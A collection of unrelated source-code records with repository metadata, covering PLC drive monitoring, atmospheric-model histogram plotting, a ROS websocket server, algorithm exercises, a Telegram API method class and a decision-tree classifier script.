messege = "NOTIFY" + ":" + " Exception rasied(process): " + str(e.args) + str(e)
logger.log(level, messege)
def callsiemendsdriveprocess(self, item):
while True:
try:
item.driveprocess
except Exception as e:
level = logging.INFO
messege = "calldriveprocess" + ":" + " Exception rasied(process): " + str(e.args) + str(e)
logger.log(level, messege)
def __init__(self, alldevices, filename):
self.subject = Observable()
self.alldevices = alldevices
self.client = Communication()
self.sta_con_plc = self.client.opc_client_connect(filename)
self.observer = AreaObserver(self.subject)
self.readgeneral = ReadGeneral(self.sta_con_plc)
def process(self, filename):
try:
for area, devices in readkeyandvalues(self.alldevices):
areavalue = self.readgeneral.readsymbolvalue(area, 'S7WLBit', 'PA')
if areavalue == 1:
self.observer.notify(devices, filename)
for j in threadlist:
j.start()
except Exception as e:
level = logging.INFO
messege = "PROCCESS" + ":" + " Exception rasied(process): " + str(e.args) + str(e)
logger.log(level, messege)
def readkeyandvalues(alldevice):
siemensdrivedictionary = alldevice.allsiemensdrives.dictionary
areas = list(siemensdrivedictionary.keys())
n = 0
while n < len(areas):
area = areas[n]
devices = siemensdrivedictionary[area]
yield area,devices
n = n + 1
|
[
"subrata.mitra@sms-group.com"
] |
subrata.mitra@sms-group.com
|
ee0bc5029cbb3d92a0311e726a37acbb4ac87617
|
6601acd5ba7aaaa11f8620df9509e951574373b4
|
/aircraft_comparisons/make_1D_histograms.py
|
bbdbf982f6c812b8a0ea1ad7599d3578d647ec37
|
[] |
no_license
|
rachawker/Hawker_ACP_2021-UM_CASIM_paper
|
852d07519e4c15791e38bdf8ba7ae4ee9ac3707c
|
ff3cdd0b1ff72b0fed477824679ab7da49976aa3
|
refs/heads/main
| 2023-04-07T20:23:16.738292
| 2021-04-22T13:07:22
| 2021-04-22T13:14:40
| 360,516,902
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,512
|
py
|
from __future__ import division
import matplotlib.gridspec as gridspec
import iris
#import iris.coord_categorisation
import iris.quickplot as qplt
import cartopy
import cartopy.feature as cfeat
import rachel_dict as ra
#import iris # library for atmos data
import cartopy.crs as ccrs
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import copy
import matplotlib.colors as cols
import matplotlib.cm as cmx
import matplotlib._cntr as cntr
from matplotlib.colors import BoundaryNorm
import netCDF4
import matplotlib.ticker as mticker
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
import os,sys
#scriptpath = "/nfs/a201/eereh/scripts/2D_maps_of_column_max_reflectivity/"
#sys.path.append(os.path.abspath(scriptpath))
import colormaps as cmaps
from matplotlib.patches import Polygon
from mpl_toolkits.basemap import Basemap
import sys
import UKCA_lib as ukl
import glob
import netCDF4 as nc
import scipy.ndimage
import rachel_lists as rl
air_up = ra.read_in_nc_variables(rl.air_updraft_file, rl.air_updraft_var)
air_TWC = ra.read_in_nc_variables(rl.air_TWC_file, rl.air_TWC_var)
air_CDNC = ra.read_in_nc_variables(rl.air_CDNC_file, rl.air_CDNC_var)
air_2ds = ra.read_in_nc_variables(rl.air_2ds_file,rl.air_2ds_var)
air_alt = ra.read_in_nc_variables(rl.air_alt_file,rl.air_alt_var)
air_iwc = ra.read_in_nc_variables(rl.air_iwc_file,rl.air_iwc_var)
air_lwc = ra.read_in_nc_variables(rl.air_lwc_file,rl.air_lwc_var)
air_temp = ra.read_in_nc_variables(rl.air_temp_file,rl.air_temp_var)
print len(air_up)
data_path = sys.argv[1]
model_path = data_path
TWC = ra.read_in_nc_variables(data_path+rl.TWC_3D_file,rl.TWC_3D_var)
TWC = TWC*1000
updrafts = ra.read_in_nc_variables(data_path+rl.UPDRAFT_3D_file,rl.UPDRAFT_3D_var)
print len(updrafts)
CDNC = ra.read_in_nc_variables(data_path+rl.CDNC_3D_file,rl.CDNC_3D_var)
CDNC = CDNC*1e-6
IWC = ra.read_in_nc_variables(data_path+rl.IWC_3D_file,rl.IWC_3D_var)
IWC=IWC*1000
LWC = ra.read_in_nc_variables(data_path+rl.LWC_3D_file,rl.LWC_3D_var)
LWC=LWC*1000
ALT = ra.read_in_nc_variables(data_path+rl.ALT_3D_file,rl.ALT_3D_var)
TEMP = ra.read_in_nc_variables(data_path+rl.TEMP_3D_file,rl.TEMP_3D_var)
ICE_NUMBER = ra.read_in_nc_variables(data_path+rl.ICE_NUMBER_3D_file,rl.ICE_NUMBER_3D_var)
ICE_NUMBER = ICE_NUMBER*1e-6
GRAUPEL_NUMBER = ra.read_in_nc_variables(data_path+rl.GRAUPEL_NUMBER_3D_file,rl.GRAUPEL_NUMBER_3D_var)
GRAUPEL_NUMBER = GRAUPEL_NUMBER*1e-6
SNOW_NUMBER = ra.read_in_nc_variables(data_path+rl.SNOW_NUMBER_3D_file,rl.SNOW_NUMBER_3D_var)
SNOW_NUMBER = SNOW_NUMBER*1e-6
TOTAL_ICE_NUMBER = ICE_NUMBER+GRAUPEL_NUMBER+SNOW_NUMBER
CDNC_cloud_base = ra.read_in_nc_variables(data_path+rl.CLOUD_BASE_DROPLET_NUMBER_2D_file, rl.CLOUD_BASE_DROPLET_NUMBER_var)
CDNC_cloud_base = CDNC_cloud_base*1e-6
updraft_cloud_base = ra.read_in_nc_variables(data_path+rl.CLOUD_BASE_UPDRAFT_2D_file, rl.CLOUD_BASE_UPDRAFT_var)
ra.plot_1d_histogram_aircraft_and_model(air_up,updrafts,'Updraft Speed (m/s)', 'Updrafts_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_TWC,TWC,'TWC (g/kg)', 'TWC_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_CDNC,CDNC,'CDNC (/cm^3)', 'CDNC_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_CDNC,CDNC_cloud_base,'CDNC at cloud base (/cm^3)', 'CDNC_at_cloud_base_1D_histogram_new_RC_data', model_path)
TWC[TWC>3]=0
TWC[TWC==0]=np.nan
TWC = TWC[~np.isnan(TWC)]
ra.plot_1d_histogram_aircraft_and_model(air_TWC,TWC,'TWC (g/kg)', 'TWC_1D_histogram_new_RC_data_3gperkg_limit', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_lwc,LWC,'LWC (g/kg)', 'LWC_CDP_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_iwc,IWC,'IWC (g/kg)', 'IWC_NEVZOROV_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_2ds,ICE_NUMBER,'Ice number / 2ds count (/cm^3)', 'ICE_CRYSTAL_NUMBER_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_2ds,TOTAL_ICE_NUMBER,'Ice number / 2ds count (/cm^3)', 'TOTAL_ICE_NUMBER_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_2ds,TOTAL_ICE_NUMBER[ALT<8000],'Ice number / 2ds count (<8000m) (/cm^3)', 'TOTAL_ICE_NUMBER_model_under_8000m_1D_histogram_new_RC_data', model_path)
|
[
"rhawker@sci2.jasmin.ac.uk"
] |
rhawker@sci2.jasmin.ac.uk
|
83c8ab86e6e3a8b6764880c6ff5d8c569fa8a7b8
|
2612f762ec75a0723a4d12ae1d63a30792e4c236
|
/src/websocket_server/src/ws_ros.py~
|
f804ffdceb5f6c972b0265f5cf2bc6bfa41642a3
|
[] |
no_license
|
aransena/catkin_ws
|
efdf1a52b7dbbefbfa9cb748630f7be1ffd7f628
|
eae6b83c80803a718a8e41569d3b4e7c1c838926
|
refs/heads/master
| 2021-01-18T21:12:48.557260
| 2016-06-03T13:39:22
| 2016-06-03T13:39:22
| 52,208,927
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,602
|
#!/usr/bin/env python
# sample code from http://iot-projects.com/index.php?id=websocket-a-simple-example
import rospy
from std_msgs.msg import String as ros_string
import tornado.httpserver
import tornado.websocket
import tornado.ioloop
import tornado.web
import json
pub = rospy.Publisher('websocket_server_msgs', ros_string)
outfile = open('data.txt', 'w')
class WSHandler(tornado.websocket.WebSocketHandler):
def check_origin(self, origin):
return True
def open(self):
print 'user is connected.\n'
def on_message(self, message):
print message
if len(message) > 10:
msg = json.loads(message)
json.dump(msg, outfile)
#print 'received message: %s\n' % json.loads(message)
pub.publish(str(message))
if message == "USER":
print "Responding..."
self.write_message(message) # + ' OK')
def on_close(self):
print 'connection closed\n'
application = tornado.web.Application([(r'/ws', WSHandler), ])
if __name__ == "__main__":
try:
pub = rospy.Publisher('websocket_server_msgs', ros_string)
rospy.init_node('websocket_server', anonymous=True)
rospy.loginfo("websocket_server started")
http_server = tornado.httpserver.HTTPServer(application)
try:
print(2)
#http_server.close_all_connections()
print(3)
except:
pass
http_server.listen(8888)
tornado.ioloop.IOLoop.instance().start()
except Exception,e:
print "Server Error ", e
pass
|
[
"aransena@gmail.com"
] |
aransena@gmail.com
|
|
31e398f160b1e7e9561e782bfa7d7d1eb3c10ec1
|
dea48ecac82d241e7960f52794eb8a29e5d2e428
|
/jianzhioffer/二叉树/字符串验证是否树的前序遍历.py
|
0947369b674e63e6e19fb50a48bf9bcedce51ce0
|
[] |
no_license
|
yxx94/2020-
|
e2302bed32c5d7d1e8b559ef378fc60408687934
|
e63431cfc3d8c8903bb383144dd0c5ed5d71aa5c
|
refs/heads/master
| 2020-09-03T09:04:08.795099
| 2019-09-19T08:12:51
| 2019-09-19T08:12:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 623
|
py
|
# coding=utf-8
# Verify whether a string is a valid preorder serialization of a binary tree
'''
// Traverse str[] once.
// A value that is not "#" opens one extra leaf slot; a "#" consumes one leaf slot.
Input:  "9,3,4,#,#,1,#,#,2,#,6,#,#"
Output: true
'''
class Solution(object):
def isValidSerialization(self, preorder):
        res = 1  # number of available leaf slots
for val in preorder.split(','):
if not res:
return False
if val == "#":
res -= 1
else:
res += 1
return not res
s = Solution()
print(s.isValidSerialization('9,3,4,#,#,1,#,#,2,#,6,#,#'))
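# A quick extra check (illustrative): an incomplete serialization leaves an open slot,
# so it should come back False.
print(s.isValidSerialization('1,#'))  # expected: False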
|
[
"jiachen0212@163.com"
] |
jiachen0212@163.com
|
2eed8db45422d9c88538efb423a9a4754c1887e2
|
3a21faa925e8a21ad5e0d6dedf3037cc52750cbd
|
/datasciencebox/tests/test_cluster.py
|
89b93a7e9fa3876d1158ec3b5b928d7a7a92c6fe
|
[
"Apache-2.0"
] |
permissive
|
yabebalFantaye/datasciencebox
|
9e630f9ad9139a609d9d925ce4a3f29467bf661f
|
9f57ae85a034357d5bc15a12f3ebd15930f33ff1
|
refs/heads/master
| 2021-01-15T18:14:01.730969
| 2015-09-06T05:42:23
| 2015-09-06T05:42:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 693
|
py
|
import pytest
from datasciencebox.core.settings import Settings
from datasciencebox.core.cloud.cluster import Cluster
settings = Settings()
def test_cluster_from_to_list():
data = [{'id': 0, 'ip': '0.0.0.0'}, {'id': 1, 'ip': '1.1.1.1'}, {'id': 2, 'ip': '2.2.2.2'}]
cluster = Cluster.from_list(data, settings)
exported = cluster.to_list()
exported_ans = [{'id': 0,
'ip': '0.0.0.0'}, {'id': 1,
'ip': '1.1.1.1'}, {'id': 2,
'ip': '2.2.2.2'}]
assert isinstance(exported, list)
assert exported == exported_ans
assert len(cluster.instances) == 3
|
[
"df.rodriguez143@gmail.com"
] |
df.rodriguez143@gmail.com
|
6e21f862d7e958f80ed264d9ffd7489494b638db
|
d9f52125601ec26f79202f0e912891b31b60ffc4
|
/오후반/Sets/3_Set_union_Operation/3_Set_union_Operation_LGY.py
|
c79cb4088243b817c276b33d76d8101e5cfec87e
|
[] |
no_license
|
YoungGaLee/2020_Python_coding-study
|
5a4f36a39021c89ac773a3a7878c44bf8b0b811f
|
b876aabc747709afa21035c3afa7e3f7ee01b26a
|
refs/heads/master
| 2022-12-12T13:34:44.729245
| 2020-09-07T04:07:48
| 2020-09-07T04:07:48
| 280,745,587
| 4
| 4
| null | 2020-07-22T03:27:22
| 2020-07-18T21:51:40
|
Python
|
UTF-8
|
Python
| false
| false
| 135
|
py
|
first = int(input())
A = set(input().split())
second = int(input())
B = set(input().split())
result = A.union(B)
print(len(result))
|
[
"noreply@github.com"
] |
YoungGaLee.noreply@github.com
|
78e205ae750a4be5a068a55c9c559e1374f631e3
|
03a2c1eb549a66cc0cff72857963eccb0a56031d
|
/hacker_rank/domains/algorithms/sorting/almost-sorted_sunghyo.jung.py
|
0264ebbc94a8388fd6ffbfafa0b6f4d7256e3e34
|
[] |
no_license
|
nobe0716/problem_solving
|
c56e24564dbe3a8b7093fb37cd60c9e0b25f8e59
|
cd43dc1eddb49d6b5965419e36db708c300dadf5
|
refs/heads/master
| 2023-01-21T14:05:54.170065
| 2023-01-15T16:36:30
| 2023-01-15T16:36:30
| 80,906,041
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 689
|
py
|
n = int(input())
ar = map(int, raw_input().split())
d = []
for i in range(1, n):
if ar[i] < ar[i - 1]:
d.append(i)
if len(d) == 0:
    print("yes")
elif len(d) == 1:
a, b = d[0] - 1, d[0]
ar[a], ar[b] = ar[b], ar[a]
if ar == sorted(ar):
print("yes")
print("swap %d %d" % (a + 1, b + 1))
else:
print("no")
elif len(d) == 2:
a, b = d[0] - 1, d[1]
ar[a], ar[b] = ar[b], ar[a]
if ar == sorted(ar):
print("yes")
print("swap %d %d" % (a + 1, b + 1))
else:
print("no")
else:
a = d[0] - 1
b = d[len(d) - 1]
if b - a != len(d):
print("no")
else:
print("yes")
print("reverse %d %d" % (a + 1, b + 1))
|
[
"sunghyo.jung@navercorp.com"
] |
sunghyo.jung@navercorp.com
|
70bbe8208649b16729cf28e1e4a6518b00610e12
|
0617c812e9bf58a2dbc1c1fef35e497b054ed7e4
|
/venv/Lib/site-packages/pyrogram/raw/functions/account/check_username.py
|
d280838035783c8751c6caf5d199e15af0b780fc
|
[] |
no_license
|
howei5163/my_framework
|
32cf510e19a371b6a3a7c80eab53f10a6952f7b2
|
492c9af4ceaebfe6e87df8425cb21534fbbb0c61
|
refs/heads/main
| 2023-01-27T14:33:56.159867
| 2020-12-07T10:19:33
| 2020-12-07T10:19:33
| 306,561,184
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,138
|
py
|
# Pyrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2020 Dan <https://github.com/delivrance>
#
# This file is part of Pyrogram.
#
# Pyrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrogram. If not, see <http://www.gnu.org/licenses/>.
from io import BytesIO
from pyrogram.raw.core.primitives import Int, Long, Int128, Int256, Bool, Bytes, String, Double, Vector
from pyrogram.raw.core import TLObject
from pyrogram import raw
from typing import List, Union, Any
# # # # # # # # # # # # # # # # # # # # # # # #
# !!! WARNING !!! #
# This is a generated file! #
# All changes made in this file will be lost! #
# # # # # # # # # # # # # # # # # # # # # # # #
class CheckUsername(TLObject): # type: ignore
"""Telegram API method.
Details:
- Layer: ``117``
- ID: ``0x2714d86c``
Parameters:
username: ``str``
Returns:
``bool``
"""
__slots__: List[str] = ["username"]
ID = 0x2714d86c
QUALNAME = "pyrogram.raw.functions.account.CheckUsername"
def __init__(self, *, username: str) -> None:
self.username = username # string
@staticmethod
def read(data: BytesIO, *args: Any) -> "CheckUsername":
# No flags
username = String.read(data)
return CheckUsername(username=username)
def write(self) -> bytes:
data = BytesIO()
data.write(Int(self.ID, False))
# No flags
data.write(String(self.username))
return data.getvalue()
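# A minimal usage sketch (an assumption, not part of the generated file): with a started
# pyrogram.Client named `app`, raw functions such as this one are dispatched through the
# client's raw-API call (`app.send(...)` on Pyrogram 1.x, `app.invoke(...)` on later
# versions); the username below is a placeholder.
#
#     is_available = await app.send(CheckUsername(username="example_username"))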
|
[
"houwei5163"
] |
houwei5163
|
b7d132d47f8448aeb6077d1264063bf458f2674c
|
e73f0bd1e15de5b8cb70f1d603ceedc18c42b39b
|
/Project Euler/014 - Collatz sequance.py
|
d3aabfadf4ae8c3e4f5527c2ef44622211ca50e0
|
[] |
no_license
|
thran/the_code
|
cbfa3b8be86c3b31f76f6fbd1deb2013d3326a4a
|
ba73317ddc42e10791a829cc6e1a3460cc601c44
|
refs/heads/master
| 2023-01-05T14:39:16.708461
| 2022-12-25T08:37:39
| 2022-12-25T08:37:39
| 160,978,160
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 305
|
py
|
def next_collatz(n):
if n % 2 == 0:
return n / 2
return 3 * n + 1
def collatz_lenght(n):
if n == 1: return 1
return collatz_lenght(next_collatz(n)) + 1
m = 0
best = 0
for i in range(1, 10**6):
l = collatz_lenght(i)
if m < l:
m = l
best = i
print m, best
|
[
"thran@centrum.cz"
] |
thran@centrum.cz
|
44b80c569089638f50802259a2b208a0acc1f02b
|
ee58b29d8982cc6987b986ee616bc47b6a8d8aa3
|
/python/dcp_367_merge_iterators.py
|
fa15d8ab6be1c94d2399b380055906ae31def2cf
|
[] |
no_license
|
gubenkoved/daily-coding-problem
|
7dd9e0a7ee6606a04cd50fa2766e650da1259f7b
|
ea8b352b1d3d1f44cd0f04ddaadf3e662f4c85bf
|
refs/heads/master
| 2021-07-03T22:31:50.519730
| 2020-09-27T10:28:09
| 2020-09-27T10:28:09
| 172,369,604
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,255
|
py
|
# This problem was asked by Two Sigma.
#
# Given two sorted iterators, merge them into one iterator.
#
# For example, given these two iterators:
#
# foo = iter([5, 10, 15])
# bar = iter([3, 8, 9])
# You should be able to do:
#
# for num in merge_iterators(foo, bar):
# print(num)
#
# # 3
# # 5
# # 8
# # 9
# # 10
# # 15
#
# Bonus: Make it work without pulling in the contents of the iterators in memory.
def merge(*iterators):
    # python iterators do NOT allow to get the current value, so we will have
    # to have a separate store
    iterators = list(iterators)  # a mutable list, so exhausted iterators can be removed below
    values = [next(iterator) for iterator in iterators]
while True:
if not iterators:
return
# pick the smallest
idx, val = min(enumerate(values), key=lambda x: x[1])
# advance the idx-th pointer
try:
iterator = iterators[idx]
values[idx] = next(iterator)
except StopIteration:
# exhausted iterator, remove it!
del iterators[idx]
del values[idx]
yield val
assert list(merge(iter([1, 2, 3]))) == [1, 2, 3]
assert list(merge(iter([5, 10, 15]), iter([3, 8, 9]))) == [3, 5, 8, 9, 10, 15]
assert list(merge(iter([10, 20, 30]), iter([15, 25]), iter([17]))) == [10, 15, 17, 20, 25, 30]
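# For the bonus (a streaming merge that never materialises its inputs), the standard
# library's heapq.merge does the same lazy k-way merge; this cross-check is illustrative
# and not part of the original exercise.
import heapq
assert list(heapq.merge([5, 10, 15], [3, 8, 9])) == [3, 5, 8, 9, 10, 15]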
|
[
"gubenkoved@gmail.com"
] |
gubenkoved@gmail.com
|
4bd60b2710f545f82a96f3c453c1fe5e6af26c4e
|
6caab8d886e8bd302d1994ff663cf5ccb5e11522
|
/MyNotes_01/Step01/4-CORE/day02_15/demo04.py
|
899097f7197eb4379f74f3afa0259428d5a3dcf2
|
[] |
no_license
|
ZimingGuo/MyNotes01
|
7698941223c79ee754b17296b9984b731858b238
|
55e6681da1a9faf9c0ec618ed60f5da9ecc6beb6
|
refs/heads/master
| 2022-07-30T21:30:32.100042
| 2020-05-19T16:59:09
| 2020-05-19T16:59:09
| 265,254,345
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,200
|
py
|
# author: Ziming Guo
# time: 2020/2/24
"""
demo04:
异常处理
练习:exercise03.py
"""
def div_apple(apple_count):
# ValueError
person_count = int(input("请输入人数:"))
# ZeroDivisionError
result = apple_count / person_count
print("每人%d个苹果"%result)
"""
try:
# 可能出错的代码
div_apple(10)
except Exception:
print("出错喽")
"""
"""
# "建议"分门别类的处理
try:
# 可能出错的代码
div_apple(10)
except ValueError:
print("输入的人数必须是整数")
except ZeroDivisionError:
print("输入的人数不能是零")
except Exception: # 这句话一般是写在最后的,以上错误都不属于才会执行这句话
print("未知错误")
"""
"""
try:
# 可能出错的代码
div_apple(10)
except Exception:
print("出错喽")
else:
# 如果异常,不执行else语句.
print("没有出错")
"""
try:
# 可能出错的代码
div_apple(10)
finally:
# 无论是否异常,一定会执行的代码.
print("finally")
# 作用:不能处理的错误,但是一定要执行的代码,就定义到finally语句中。
print("后续逻辑.....")
|
[
"guoziming99999@icloud.com"
] |
guoziming99999@icloud.com
|
dda479fe3985fbe635d716f2b72e44d05c545d36
|
016109b9f052ffd037e9b21fa386b36089b05813
|
/checkTree.py
|
824b6551f6e8aaa158948abc4cfda4bca896f43e
|
[] |
no_license
|
nsshayan/DataStructuresAndAlgorithms
|
9194508c5227c5c8c60b9950917a4ea8da8bbab2
|
2f7ee1bc8f4b53c35d1cce62e898a9695d99540a
|
refs/heads/master
| 2022-09-29T21:15:33.803558
| 2022-09-08T17:14:59
| 2022-09-08T17:14:59
| 73,257,752
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 308
|
py
|
'''
Given :-
the number of nodes in a graph
the degree of each of the vertices
Find whether the given graph is a tree or not
'''
N = int(raw_input())
Degree = raw_input().split(" ")
sum = 0
for i in range(len(Degree)):
sum = sum + int(Degree[i])
if sum/2 == N-1:
print "YES"
else :
print "NO"
|
[
"nsshayan89@gmail.com"
] |
nsshayan89@gmail.com
|
b6faf20877f683beab77c503370315724c92cdac
|
5fb579602489728ac47e195bd15838eb632aece4
|
/tests/test_utils.py
|
99a1fd9fe74c0728ba2a92baf3a1f722c68f4174
|
[
"MIT"
] |
permissive
|
Cesare-Liu/cryptokit
|
6101701f3daec60ce8ca2f8a2bb464a58ccae20e
|
bfb90c229279c3c755bdbedfe659d7d5b6e65b51
|
refs/heads/master
| 2020-03-27T10:38:20.714133
| 2018-06-07T06:15:51
| 2018-06-07T06:15:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,410
|
py
|
# coding: utf-8
"""test utils."""
from __future__ import unicode_literals
import datetime
from unittest import TestCase
from cryptokit.rsa import RSACrypto
from cryptokit.utils import (load_pfx, generate_certificate, generate_pfx,
get_pubkey_from_pfx)
class UtilTestCase(TestCase):
"""RSACrypto useage test."""
def setUp(self):
private_key = RSACrypto.generate_private_key(2048)
RSACrypto.dump_private_key_pem(private_key)
self.private_key = private_key
self.public_key = private_key.public_key()
validity = datetime.timedelta(days=365)
self.not_valid_before = datetime.datetime.today()
self.not_valid_after = self.not_valid_before + validity
payload = {
'common_name': 'CA',
'country_name': 'CN',
'email_address': 'codingcat@gmail.com',
'org_name': '数字认证中心',
'company_name': '编程猫科技',
'state_or_province': '浙江省',
'locality_name': '杭州市',
'private_key': self.private_key,
'public_key': self.public_key,
'serial_number': 9219100179121295299
}
self.payload = payload
def test_generate_certificate(self):
"""Test generate certificate."""
cert = generate_certificate(
self.not_valid_before, self.not_valid_after, **self.payload)
self.assertEqual(cert.serial_number, self.payload['serial_number'])
def test_generate_pfx(self):
"""Test generate pfx."""
cert = generate_certificate(
self.not_valid_before, self.not_valid_after, **self.payload)
pfx = generate_pfx(
cert, self.payload['company_name'], self.private_key)
pkcs12 = load_pfx(pfx)
self.assertEqual(
cert.serial_number,
pkcs12.get_certificate().get_serial_number()
)
def test_get_pubkey_from_pfx(self):
"""Test get_pubkey_from_pfx."""
cert = generate_certificate(
self.not_valid_before, self.not_valid_after, **self.payload)
pfx_file = generate_pfx(
cert, self.payload['company_name'], self.private_key)
pubkey = get_pubkey_from_pfx(pfx_file, password=None)
self.assertEqual(cert.public_key().public_numbers(),
pubkey.public_numbers())
|
[
"istommao@gmail.com"
] |
istommao@gmail.com
|
d152111c4317b9090484c966da3a4671a305c7de
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02755/s084222637.py
|
a56cd5d0e5b0b0922a2417c7c93736a84b7a05d5
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 136
|
py
|
a,b=map(int,input().split())
for i in range(100001):
if int(i*0.08) == a and int(i*0.1) == b:
print(i)
break
else:
print(-1)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
76da4859384e1d8a645aaf5c79f6116f3d66c864
|
38c35956be6343855914b1c58b8fbd2e40c6e615
|
/Strings/2023.py
|
449cb787bc1f493dc6d2d3557856b2f76693cf95
|
[] |
no_license
|
LucasBarbosaRocha/URI
|
b43e4f4a6b3beed935f24839001bea354411c4bd
|
2c9bcc13300a9f6243242e483c8f9ec3296a88ad
|
refs/heads/master
| 2020-06-25T05:06:51.297824
| 2019-08-22T04:50:11
| 2019-08-22T04:50:11
| 199,210,037
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 343
|
py
|
lista = []
l = ""
while True:
try:
entrada = input()
l = l + entrada + "+"
except :
break
#print (l)
l = l[:len(l) - 1]
original = l.split("+")
lista = l.lower()
lista = lista.split("+")
lista.sort()
escolhido = lista[len(lista) - 1]
for i in range(len(original)):
if (escolhido == original[i].lower()):
print (original[i])
break
|
[
"lucas.lb.rocha@gmail.com"
] |
lucas.lb.rocha@gmail.com
|
58412d85187532f9f42d4f40e1c022211b03d8f3
|
4e1af52e60dd997fca04be3485e157292cf84b6a
|
/2020/tests/test_day08.py
|
c14b7db55c5cf09e4fcbd77b7364367ebec9a8fd
|
[
"MIT"
] |
permissive
|
JesperDramsch/advent-of-code
|
e0173d4e78cf274ae461b39d619f56a03ef54773
|
ccad3d578be473bf44dea7284c2f99fd67f3271c
|
refs/heads/main
| 2023-01-13T07:18:30.772913
| 2022-12-25T16:12:02
| 2022-12-25T16:39:53
| 160,000,829
| 7
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 654
|
py
|
import sys
import pytest
sys.path.insert(0, ".")
from util import Day
from day08 import *
@pytest.fixture(scope="function")
def day():
day = Day(8)
day.load(typing=str)
return day
def test_example(day):
data = """nop +0
acc +1
jmp +4
acc +3
jmp -3
acc -99
acc +1
jmp -4
acc +6"""
day.load(data, typing=str)
assert main(day, part=1) == 5
def test_example_p2(day):
data = """nop +0
acc +1
jmp +4
acc +3
jmp -3
acc -99
acc +1
jmp -4
acc +6"""
day.load(data, typing=str)
assert main(day, part=2) == 8
def test_part1(day):
assert main(day, part=1) == 1753
def test_part2(day):
assert main(day, part=2) == 733
|
[
"jesper@dramsch.net"
] |
jesper@dramsch.net
|
b207fefd6ccd6d562f1572e2426380b43b6f1983
|
76563ffc91a6f35ffab2986693f0124a3a3aaf86
|
/Crawler/2-DecisionTreeClassifier.py
|
4f7047571f73169fdfd436414573723cf4d2f024
|
[] |
no_license
|
zelenkastiot/FCSE-Data-Mining
|
ab7aea21402742c518857a1c871d3e0a033f8581
|
6e1ffbada09784bb846af54aefc57fe0eb257a17
|
refs/heads/master
| 2023-02-27T17:14:10.457335
| 2021-02-07T22:13:20
| 2021-02-07T22:13:20
| 289,999,697
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,994
|
py
|
"""
Created on 15-Jan-21
@author: Kiril Zelenkovski
"""
import math
from sklearn.preprocessing import OrdinalEncoder, LabelEncoder
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import CategoricalNB
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import accuracy_score
import pandas as pd
# Read csv
dataset = pd.read_csv("dataset.csv")
dataset = dataset.drop("Address Region", 1)
dataset = dataset.drop("Street Address", 1)
dataset = dataset.drop("Address Locality", 1)
dataset = dataset.drop("Postal Code", 1)
dataset = dataset.drop("Price", 1)
dataset = dataset.drop("Beds", 1)
print(dataset)
columns = dataset.columns.tolist()
dataset = dataset.values.tolist()
# Use Ordinal Encoder to encode categorical features as an integer array
encoder = OrdinalEncoder()
encoder.fit([dataset[j][:-1] for j in range(0, len(dataset))])
# Split dataset 75% train, 25% test
# test_csv = dataset[math.ceil(0.75 * len(dataset)):]
# train_csv = dataset[0:math.ceil(0.75 * len(dataset))]
X_dataset = [dataset[j][:-1] for j in range(0, len(dataset))]
y_dataset = [dataset[j][-1] for j in range(0, len(dataset))]
X, X_test, y, y_test = train_test_split(X_dataset,
y_dataset,
test_size=0.2,
random_state=42)
# Transform the training rows with the fitted encoder (the raw values mix strings and ints)
X = encoder.transform(X)
# Decision Tree Classifier: A non-parametric supervised learning method used for classification
classifier = DecisionTreeClassifier(criterion='entropy', random_state=0)
# Fit Decision Tree Classifier according to X, y
classifier.fit(X, y)
# Call encoder.transform to transform the data
X_test = encoder.transform(X_test)
# Print accuracy using imported metrics
y_predicted = [classifier.predict([x])[0] for x in X_test]
print(f'DecisionTreeClassifier accuracy: {accuracy_score(y_test, y_predicted, normalize=True):.4f}')
# Print depth for classifier
print('Depth:', classifier.get_depth())
# Print # of leaves for classifier
print('Number of leaves:', classifier.get_n_leaves())
# Load importance of features in list
feature_importance = list(classifier.feature_importances_)
# Most and least important feature
